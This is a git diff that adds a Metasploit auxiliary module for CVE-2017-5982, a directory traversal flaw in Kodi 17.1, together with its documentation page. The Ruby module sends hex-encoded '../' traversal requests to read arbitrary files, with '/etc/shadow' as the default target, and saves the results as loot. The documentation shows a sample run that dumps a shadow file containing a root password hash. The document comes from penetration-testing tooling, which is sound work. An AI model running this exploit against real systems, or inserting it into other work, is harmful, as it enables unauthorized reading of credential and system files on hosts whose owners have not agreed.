diff --git a/documentation/modules/auxiliary/scanner/http/kodi_traversal.md b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md new file mode 100644 index 0000000000..870de95b28 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md @@ -0,0 +1,40 @@ +## Vulnerable Application + +This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1. + +**Vulnerable Application Installation Steps** + +Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if +you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux). + +You'll need a version lower than 17.1. + +## Verification Steps + +A successful check of the exploit will look like this: + +``` +msf > use auxiliary/scanner/http/kodi_traversal +msf auxiliary(kodi_traversal) > set RPORT 8080 +RPORT => 8080 +msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31 +RHOSTS => 192.168.0.31 +msf auxiliary(kodi_traversal) > run + +[*] Reading '/etc/shadow' +[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin' +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(kodi_traversal) > cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin +[*] exec: cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin + +systemd-network:*::::::: +root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.::::::: +nobody:*::::::: +dbus:*::::::: +system:*::::::: +sshd:*::::::: +avahi:*::::::: +msf auxiliary(kodi_traversal) > info + +``` diff --git a/modules/auxiliary/scanner/http/kodi_traversal.rb b/modules/auxiliary/scanner/http/kodi_traversal.rb new file mode 100644 index 0000000000..6c32bd9dec --- /dev/null +++ b/modules/auxiliary/scanner/http/kodi_traversal.rb @@ -0,0 +1,84 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Kodi 17.1 Local File Inclusion Vulnerability', + 'Description' => %q{ + This module exploits a directory traversal flaw found in Kodi 17.1. + }, + 'References' => + [ + ['CVE', '2017-5982'], + ], + 'Author' => + [ + 'Eric Flokstra', #Original + 'jvoisin' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Feb 12 2017" + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']), + OptString.new('FILE', [true, 'The file to obtain', '/etc/shadow']), + OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10]) + ], self.class) + end + + + def run_host(ip) + base = normalize_uri(target_uri.path) + + peer = "#{ip}:#{rport}" + + print_status("Reading '#{datastore['FILE']}'") + + traverse = '../' * datastore['DEPTH'] + f = datastore['FILE'] + f = f[1, f.length] if f =~ /^\// + f = "image/image://" + Rex::Text.uri_encode(traverse + f, "hex-all") + + uri = normalize_uri(base, Rex::Text.uri_encode(f, "hex-all")) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + if res and res.code != 200 + print_error("Unable to read '#{datastore['FILE']}', possibily because:") + print_error("\t1. File does not exist.") + print_error("\t2. No permission.") + + elsif res and res.code == 200 + data = res.body.lstrip + fname = datastore['FILE'] + p = store_loot( + 'kodi', + 'application/octet-stream', + ip, + data, + fname + ) + + vprint_line(data) + print_good("#{fname} stored as '#{p}'") + + else + print_error("Fail to obtain file for some unknown reason") + end + end + +end